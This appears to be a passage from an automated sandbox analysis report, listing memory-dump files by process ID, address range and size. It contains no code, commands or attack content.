memory/1540-114-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/2224-207-0x0000000000F70000-0x0000000000F71000-memory.dmpFilesize
4KB
-
memory/2224-219-0x000000001C8E0000-0x000000001C8E2000-memory.dmpFilesize
8KB
-
memory/2224-204-0x0000000000000000-mapping.dmp
-
memory/2472-454-0x00000237597B6000-0x00000237597B8000-memory.dmpFilesize
8KB
-
memory/2472-1203-0x0000000000000000-mapping.dmp
-
memory/2472-334-0x00000237597B0000-0x00000237597B2000-memory.dmpFilesize
8KB
-
memory/2472-300-0x0000000000000000-mapping.dmp
-
memory/2472-336-0x00000237597B3000-0x00000237597B5000-memory.dmpFilesize
8KB
-
memory/2516-160-0x0000000000000000-mapping.dmp
-
memory/2600-1015-0x0000000000000000-mapping.dmp
-
memory/2648-170-0x0000000000000000-mapping.dmp
-
memory/2660-124-0x0000000000000000-mapping.dmp
-
memory/2660-135-0x0000000005500000-0x0000000005501000-memory.dmpFilesize
4KB
-
memory/2660-142-0x0000000005390000-0x0000000005996000-memory.dmpFilesize
6.0MB
-
memory/2660-128-0x0000000000BC0000-0x0000000000BC1000-memory.dmpFilesize
4KB
-
memory/2660-195-0x0000000007050000-0x0000000007051000-memory.dmpFilesize
4KB
-
memory/2660-133-0x00000000053D0000-0x00000000053D1000-memory.dmpFilesize
4KB
-
memory/2660-191-0x0000000006C30000-0x0000000006C31000-memory.dmpFilesize
4KB
-
memory/2660-130-0x00000000059A0000-0x00000000059A1000-memory.dmpFilesize
4KB
-
memory/2660-199-0x0000000007140000-0x0000000007141000-memory.dmpFilesize
4KB
-
memory/2660-136-0x0000000005430000-0x0000000005431000-memory.dmpFilesize
4KB
-
memory/2660-197-0x0000000007170000-0x0000000007171000-memory.dmpFilesize
4KB
-
memory/2724-161-0x0000000000000000-mapping.dmp
-
memory/3032-1019-0x0000000000000000-mapping.dmp
-
memory/3048-117-0x0000000000AE0000-0x0000000000AF6000-memory.dmpFilesize
88KB
-
memory/3048-152-0x0000000002A90000-0x0000000002AA6000-memory.dmpFilesize
88KB
-
memory/3264-122-0x0000000000402E68-mapping.dmp
-
memory/3428-211-0x0000000000000000-mapping.dmp
-
memory/3428-215-0x000001F6511F0000-0x000001F6511F1000-memory.dmpFilesize
4KB
-
memory/3848-244-0x0000000000000000-mapping.dmp
-
memory/3848-272-0x0000019B0F3D0000-0x0000019B0F3D2000-memory.dmpFilesize
8KB
-
memory/3848-677-0x0000019B0F3D6000-0x0000019B0F3D8000-memory.dmpFilesize
8KB
-
memory/3848-273-0x0000019B0F3D3000-0x0000019B0F3D5000-memory.dmpFilesize
8KB
-
memory/3856-118-0x0000000000000000-mapping.dmp
-
memory/3856-127-0x0000000002B50000-0x0000000002C9A000-memory.dmpFilesize
1.3MB
-
memory/3996-164-0x0000000000000000-mapping.dmp
-
memory/4072-241-0x0000000000000000-mapping.dmp
-
memory/4072-268-0x0000018C7AB93000-0x0000018C7AB95000-memory.dmpFilesize
8KB
-
memory/4072-267-0x0000018C7AB90000-0x0000018C7AB92000-memory.dmpFilesize
8KB
-
memory/4072-401-0x0000018C7AB96000-0x0000018C7AB98000-memory.dmpFilesize
8KB
-
memory/4304-163-0x0000000000000000-mapping.dmp
-
memory/4308-285-0x0000000004170000-0x00000000041C8000-memory.dmpFilesize
352KB
-
memory/4308-353-0x00000000067A3000-0x00000000067A4000-memory.dmpFilesize
4KB
-
memory/4308-291-0x0000000000400000-0x000000000217F000-memory.dmpFilesize
29.5MB
-
memory/4308-245-0x0000000000000000-mapping.dmp
-
memory/4308-352-0x00000000067A2000-0x00000000067A3000-memory.dmpFilesize
4KB
-
memory/4308-288-0x00000000022A0000-0x00000000023EA000-memory.dmpFilesize
1.3MB
-
memory/4308-296-0x00000000067A0000-0x00000000067A1000-memory.dmpFilesize
4KB
-
memory/4324-181-0x0000000002539A6B-mapping.dmp
-
memory/4324-180-0x0000000002530000-0x0000000002545000-memory.dmpFilesize
84KB
-
memory/4344-653-0x000001C132E06000-0x000001C132E08000-memory.dmpFilesize
8KB
-
memory/4344-251-0x0000000000000000-mapping.dmp
-
memory/4344-270-0x000001C132E00000-0x000001C132E02000-memory.dmpFilesize
8KB
-
memory/4344-271-0x000001C132E03000-0x000001C132E05000-memory.dmpFilesize
8KB
-
memory/4416-165-0x0000000000000000-mapping.dmp
-
memory/4496-176-0x0000000077580000-0x000000007770E000-memory.dmpFilesize
1.6MB
-
memory/4496-172-0x0000000000B70000-0x0000000000B71000-memory.dmpFilesize
4KB
-
memory/4496-184-0x00000000051B0000-0x00000000057B6000-memory.dmpFilesize
6.0MB
-
memory/4496-166-0x0000000000000000-mapping.dmp
-
memory/4504-299-0x0000000004D30000-0x000000000522E000-memory.dmpFilesize
5.0MB
-
memory/4504-275-0x0000000000000000-mapping.dmp
-
memory/4504-279-0x0000000000570000-0x0000000000571000-memory.dmpFilesize
4KB
-
memory/4504-294-0x0000000004DF0000-0x0000000004DF1000-memory.dmpFilesize
4KB
-
memory/4536-185-0x0000000002C30000-0x0000000002C43000-memory.dmpFilesize
76KB
-
memory/4536-186-0x0000000000400000-0x0000000002B48000-memory.dmpFilesize
39.3MB
-
memory/4648-116-0x0000000002CE0000-0x0000000002CE9000-memory.dmpFilesize
36KB
-
memory/4820-243-0x00000201DC460000-0x00000201DC462000-memory.dmpFilesize
8KB
-
memory/4820-222-0x0000000000000000-mapping.dmp
-
memory/4820-587-0x00000201DC466000-0x00000201DC468000-memory.dmpFilesize
8KB
-
memory/4820-248-0x00000201DC463000-0x00000201DC465000-memory.dmpFilesize
8KB
-
memory/4844-591-0x000002462F056000-0x000002462F058000-memory.dmpFilesize
8KB
-
memory/4844-247-0x000002462F060000-0x000002462F061000-memory.dmpFilesize
4KB
-
memory/4844-246-0x000002462F053000-0x000002462F055000-memory.dmpFilesize
8KB
-
memory/4844-242-0x000002462F050000-0x000002462F052000-memory.dmpFilesize
8KB
-
memory/4844-221-0x0000000000000000-mapping.dmp
-
memory/4844-298-0x0000024648020000-0x0000024648021000-memory.dmpFilesize
4KB
-
memory/4848-252-0x0000023E3E6E3000-0x0000023E3E6E5000-memory.dmpFilesize
8KB
-
memory/4848-220-0x0000000000000000-mapping.dmp
-
memory/4848-250-0x0000023E3E6E0000-0x0000023E3E6E2000-memory.dmpFilesize
8KB
-
memory/4848-585-0x0000023E3E6E6000-0x0000023E3E6E8000-memory.dmpFilesize
8KB
-
memory/5000-2795-0x0000000000000000-mapping.dmp
-
memory/5016-700-0x0000000005490000-0x0000000005A96000-memory.dmpFilesize
6.0MB
-
memory/5016-658-0x0000000077580000-0x000000007770E000-memory.dmpFilesize
1.6MB
-
memory/5016-201-0x0000000000000000-mapping.dmp
-
memory/5096-289-0x0000000000000000-mapping.dmp
-
memory/5096-733-0x000001BE1A896000-0x000001BE1A898000-memory.dmpFilesize
8KB
-
memory/5096-333-0x000001BE1A893000-0x000001BE1A895000-memory.dmpFilesize
8KB
-
memory/5096-329-0x000001BE1A890000-0x000001BE1A892000-memory.dmpFilesize
8KB
-
memory/5168-1018-0x0000000000000000-mapping.dmp
-
memory/5172-366-0x0000000000000000-mapping.dmp
-
memory/5172-781-0x0000022565356000-0x0000022565358000-memory.dmpFilesize
8KB
-
memory/5172-400-0x0000022565353000-0x0000022565355000-memory.dmpFilesize
8KB
-
memory/5172-399-0x0000022565350000-0x0000022565352000-memory.dmpFilesize
8KB
-
memory/5208-2295-0x00000000004062F1-mapping.dmp
-
memory/5284-1020-0x0000000000000000-mapping.dmp
-
memory/5420-554-0x0000000000000000-mapping.dmp
-
memory/5420-567-0x0000000006CC2000-0x0000000006CC3000-memory.dmpFilesize
4KB
-
memory/5420-566-0x0000000006CC0000-0x0000000006CC1000-memory.dmpFilesize
4KB
-
memory/5468-417-0x0000000007590000-0x0000000007591000-memory.dmpFilesize
4KB
-
memory/5468-419-0x0000000007592000-0x0000000007593000-memory.dmpFilesize
4KB
-
memory/5468-395-0x0000000000000000-mapping.dmp
-
memory/5812-538-0x0000000004BA2000-0x0000000004BA3000-memory.dmpFilesize
4KB
-
memory/5812-522-0x0000000000000000-mapping.dmp
-
memory/5812-536-0x0000000004BA0000-0x0000000004BA1000-memory.dmpFilesize
4KB
-
memory/5816-436-0x0000000000000000-mapping.dmp
-
memory/5884-784-0x000001B08D336000-0x000001B08D338000-memory.dmpFilesize
8KB
-
memory/5884-443-0x0000000000000000-mapping.dmp
-
memory/5884-487-0x000001B08D330000-0x000001B08D332000-memory.dmpFilesize
8KB
-
memory/5884-488-0x000001B08D333000-0x000001B08D335000-memory.dmpFilesize
8KB
-
memory/6100-503-0x00000000028E2000-0x00000000028E3000-memory.dmpFilesize
4KB
-
memory/6100-476-0x0000000000000000-mapping.dmp
-
memory/6100-502-0x00000000028E0000-0x00000000028E1000-memory.dmpFilesize
4KB
-
memory/6136-1017-0x0000000000000000-mapping.dmp
-
memory/6196-1022-0x0000000000000000-mapping.dmp
-
memory/6252-1023-0x0000000000000000-mapping.dmp
-
memory/6316-1024-0x0000000000000000-mapping.dmp
-
memory/6364-1025-0x0000000000000000-mapping.dmp
-
memory/6408-1026-0x0000000000000000-mapping.dmp
-
memory/6456-1027-0x0000000000000000-mapping.dmp
-
memory/6684-2767-0x0000000000000000-mapping.dmp